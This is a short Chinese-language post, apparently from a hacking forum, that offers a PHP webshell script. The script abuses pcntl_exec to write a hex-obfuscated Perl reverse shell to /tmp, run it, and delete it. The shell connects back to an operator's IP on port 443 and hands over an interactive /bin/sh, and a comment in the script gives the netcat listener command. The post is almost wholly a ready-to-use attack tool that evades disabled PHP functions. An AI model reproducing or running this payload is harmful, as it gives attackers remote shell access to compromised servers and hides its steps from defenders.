CTRL+ F
–enable-pcntl
今天居然可以用到.哈 狗屎运. 来自t00ls
< ?php /******************************* *查看phpinfo编译参数--enable-pcntl *作者 Spider *nc -vvlp 443 ********************************/ $ip = 'xxx.xxx.xxx.xxx'; $port = '443'; $file = '/tmp/bc.pl'; header("content-Type: text/html; charset=gb2312"); if(function_exists('pcntl_exec')) { $data = "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx20x2dx77x0dx0ax23x0dx0a". "x0dx0ax75x73x65x20x73x74x72x69x63x74x3bx20x20x20x20x0dx0ax75x73x65x20". "x53x6fx63x6bx65x74x3bx0dx0ax75x73x65x20x49x4fx3ax3ax48x61x6ex64x6cx65". "x3bx0dx0ax0dx0ax6dx79x20x24x72x65x6dx6fx74x65x5fx69x70x20x3dx20x27".$ip. "x27x3bx0dx0ax6dx79x20x24x72x65x6dx6fx74x65x5fx70x6fx72x74x20x3dx20x27".$port. "x27x3bx0dx0ax0dx0ax6dx79x20x24x70x72x6fx74x6fx20x3dx20x67x65x74x70x72". "x6fx74x6fx62x79x6ex61x6dx65x28x22x74x63x70x22x29x3bx0dx0ax6dx79x20x24". "x70x61x63x6bx5fx61x64x64x72x20x3dx20x73x6fx63x6bx61x64x64x72x5fx69x6e". "x28x24x72x65x6dx6fx74x65x5fx70x6fx72x74x2cx20x69x6ex65x74x5fx61x74x6f". "x6ex28x24x72x65x6dx6fx74x65x5fx69x70x29x29x3bx0dx0ax6dx79x20x24x73x68". "x65x6cx6cx20x3dx20x27x2fx62x69x6ex2fx73x68x20x2dx69x27x3bx0dx0ax73x6f". "x63x6bx65x74x28x53x4fx43x4bx2cx20x41x46x5fx49x4ex45x54x2cx20x53x4fx43". "x4bx5fx53x54x52x45x41x4dx2cx20x24x70x72x6fx74x6fx29x3bx0dx0ax53x54x44". "x4fx55x54x2dx3ex61x75x74x6fx66x6cx75x73x68x28x31x29x3bx0dx0ax53x4fx43". "x4bx2dx3ex61x75x74x6fx66x6cx75x73x68x28x31x29x3bx0dx0ax63x6fx6ex6ex65". "x63x74x28x53x4fx43x4bx2cx24x70x61x63x6bx5fx61x64x64x72x29x20x6fx72x20". "x64x69x65x20x22x63x61x6ex20x6ex6fx74x20x63x6fx6ex6ex65x63x74x3ax24x21". "x22x3bx0dx0ax6fx70x65x6ex20x53x54x44x49x4ex2cx20x22x3cx26x53x4fx43x4b". "x22x3bx0dx0ax6fx70x65x6ex20x53x54x44x4fx55x54x2cx20x22x3ex26x53x4fx43". "x4bx22x3bx0dx0ax6fx70x65x6ex20x53x54x44x45x52x52x2cx20x22x3ex26x53x4f". "x43x4bx22x3bx0dx0ax73x79x73x74x65x6dx28x24x73x68x65x6cx6cx29x3bx0dx0a". "x63x6cx6fx73x65x20x53x4fx43x4bx3bx0dx0ax65x78x69x74x20x30x3bx0a"; $fp = fopen($file,'w'); $key = fputs($fp,$data); fclose($fp); if(!$key) exit('写入'.$file.'失败'); chmod($file,0777); pcntl_exec($file); unlink($file); } else { echo '不支持pcntl扩展'; } ?>